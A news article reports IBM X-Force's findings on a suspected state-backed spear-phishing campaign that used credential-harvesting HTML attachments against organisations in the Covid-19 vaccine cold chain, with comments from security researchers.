Elements of the international vaccine supply chain are being targeted by a global phishing campaign that is likely the work of a national state-backed cyber attacker, according to IBM Security’s X-Force unit.
This development comes on the heels of a global alert issued by Interpol to its 194 member states, warning that malicious actors were targeting target organizations associated with Covid-19 vaccines.
The ongoing campaign is aimed at organizations closely associated with the cold chain, part of the vaccine supply chain that ensures the safe storage of vaccines in temperature-controlled environments during transit.
The cold chain will be critical to the deployment of two of the most promising Covid-19 vaccines, the one developed by Pfizer / BioNTech, which should be kept at -70 ° C, and the one developed by Moderna, which should be kept at -20 ° C. .
The X-Force team said their analysis pointed to a “calculated operation” starting in September, covering six countries and targeting organizations associated with the international vaccine alliance Gavi’s cold chain equipment optimization platform. (CCEOP).
He was unable to pinpoint the campaign, but said that both the precise targeting of key executives in relevant organizations carried the “potential characteristics of the nation-state office.”
IBM Strategic Cyber Threat Senior Analyst Claire Zaboeva wrote: “While attribution is currently unknown, the precise targeting and nature of the specific organizations targeted potentially point to nation-state activity.
“Without a clear path to cash out, cybercriminals are unlikely to dedicate the time and resources required to execute such a calculated operation with so many interconnected and globally distributed targets. Similarly, understanding the transportation of a vaccine can represent a hot commodity on the black market. However, advanced information on the purchase and movement of a vaccine that can affect life and the world economy is likely to be a high-value, high-priority target for nation states. “
According to IBM X-Force, the attacker has been posing as an executive from Haier Biomedical, a cold chain specialist, to target organizations such as the European Commission’s Directorate General for Taxes and Customs Union, and energy companies, manufacturing, website creation and software. and Internet security sectors.
The spear-phishing emails were primarily directed at executives in the sales, procurement, IT, and finance departments, but in some cases also at people from other parts of the organization.
The subject lines are appointment requests related to the CCEOP program, but the emails contain malicious HTML attachments that are opened locally, prompting their victims to enter their credentials to view the file.
Their goal is almost certainly to collect credentials and thus gain future access to corporate networks and data on vaccine distribution processes, methods, and plans, such as information on how governments will put the Covid-19 vaccine in the hands of national health services.
Max Heinemeyer, director of threat hunting at Darktrace, said attacking the vaccine supply chain is likely to be easier for perpetrators than pursuing prime targets in the healthcare sector.
“This particular effort to disrupt vaccine research and development confirms that the barrier between ‘cyber’ and ‘physical’ supply chains has almost dissolved,” he said. Today’s attacks can start in the inbox and end up disrupting the delivery chain of a critical vaccine or service.
“A single phishing attack is easy to carry out, but running an orchestrated spear-phishing campaign against high-profile targets like this shows a lot of sophistication. The attack appears broad and sophisticated, broader than typical cybercrime campaigns that aim for rapid monetization. “
Although the goals of the campaign are, at this stage, mere speculation, Heinemeyer suggested that information about the physical whereabouts of vaccines that must be kept extremely cold could be useful information for many nation states.
The fact that the campaign has been running for some time is also cause for concern, he added. “Organizations need to get a lot better at detecting unusual digital activity at a much earlier stage, using cutting edge defense technology, particularly artificial intelligence, across their entire digital infrastructure,” he said.
Maria Namestnikova, Head of Kaspersky’s Global Research and Analysis Team (GReAT) in Russia, said: “Threat actors continue to pivot and exploit the Covid-19 pandemic to carry out highly advanced cyber attacks with this latest attack on the Covid vaccine. -19. Recently, Kaspersky and several other cybersecurity companies have noticed a growing interest from APT threat actors in vaccine development.
“During the first six months of research on a Covid-19 vaccine, there were only messages from Western intelligence agencies about WellMess’s attacks on drug developers. Now, in recent weeks, the cybersecurity community has reported attempts to engage investigators in the US, South Korea, Canada, France, and India.
“Some of this activity is reported to have been linked to North Korean actors. Overall, we believe that APT stakeholders’ interest in vaccine development will continue to grow and that these attacks will be exploited as part of a geopolitical strategy. Thus, false flags, for example email addresses with a .ru domain, a technique already used by some threat actors, can be used to try to deflect attackers’ suspicions, leading to potential disputes. geopolitical “.
IBM’s Zaboeva added: “IBM Security X-Force urges companies in the Covid-19 supply chain, from researching therapies, delivering healthcare to distributing a vaccine, to be vigilant and on high alert. during this time.
“Governments have already warned that foreign entities are likely to attempt cyber espionage to steal information on vaccines. Today, in conjunction with this blog, DHS CISA is issuing an alert encouraging organizations associated with the storage and transportation of a vaccine to review this research and recommended best practices to remain vigilant. “